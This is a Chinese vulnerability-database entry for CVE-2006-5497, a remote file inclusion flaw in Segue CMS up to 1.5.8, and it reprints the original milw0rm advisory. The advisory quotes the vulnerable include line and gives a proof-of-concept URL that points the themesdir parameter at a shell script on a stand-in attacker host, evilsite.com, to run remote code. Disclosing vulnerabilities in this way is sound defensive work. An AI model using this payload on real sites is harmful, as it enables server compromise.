Segue CMS Themesdir 'themesettings.inc.php'远程文件包含漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1111332 漏洞类型 输入验证
发布时间 2006-10-19 更新时间 2006-11-01
CVE编号 CVE-2006-5497 CNNVD-ID CNNVD-200610-408
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/2600
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200610-408
|漏洞详情
SegueCMS1.5.8及更早版本的themes/program/themesettings.inc.php中存在PHP远程文件包含漏洞,在启用register_globals的情况下,远程攻击者可借助themesdir参数中的URL执行任意PHP代码。
|漏洞EXP
+-------------------------------------------------------------------------------------------
+ Segue CMS <= 1.5.8 (themesdir) Remote File Include Vulnerability
+-------------------------------------------------------------------------------------------
+ Affected Software .: Segue CMS <= 1.5.8
+ Vendor ............: http://segue.middlebury.edu/
+ Download ..........: http://sourceforge.net/project/showfiles.php?group_id=82171
+ Description .......: "Segue is an open source collaborative content management system"
+ Class .............: Remote File Inclusion
+ Risk ..............: High (Remote File Execution)
+ Found By ..........: nuffsaid <nuffsaid[at]newbslove.us>
+-------------------------------------------------------------------------------------------
+ Details:
+ Segue CMS themes/program/themesettings.inc.php does not intialize the $themesdir variable
+ before using it to include files, assuming register_globals = on, we can intialize the
+ variable in a query string and include a remote file of our choice. Tested and working on
+ version 1.5.4 and 1.5.8 (previous versions may also be affected).
+ 
+ Vulnerable Code:
+ themes/program/themesettings.inc.php, line(s) 02: include("$themesdir/$theme/colors.inc.php");
+ 
+ Proof of Concept:
+ http://[target]/[path]/themes/program/themesettings.inc.php?themesdir=http://evilsite.com/shell.php?
+-------------------------------------------------------------------------------------------

# milw0rm.com [2006-10-19]
|参考资料

来源:XF
名称:seguecms-themesettings-file-include(29692)
链接:http://xforce.iss.net/xforce/xfdb/29692
来源:BID
名称:20640
链接:http://www.securityfocus.com/bid/20640
来源:OSVDB
名称:29904
链接:http://www.osvdb.org/29904
来源:MILW0RM
名称:2600
链接:http://www.milw0rm.com/exploits/2600
来源:VUPEN
名称:ADV-2006-4122
链接:http://www.frsirt.com/english/advisories/2006/4122
来源:sourceforge.net
链接:http://sourceforge.net/forum/forum.php?forum_id=625467
来源:SECUNIA
名称:22491
链接:http://secunia.com/advisories/22491
来源:MILW0RM
名称:2600
链接:http://milw0rm.com/exploits/2600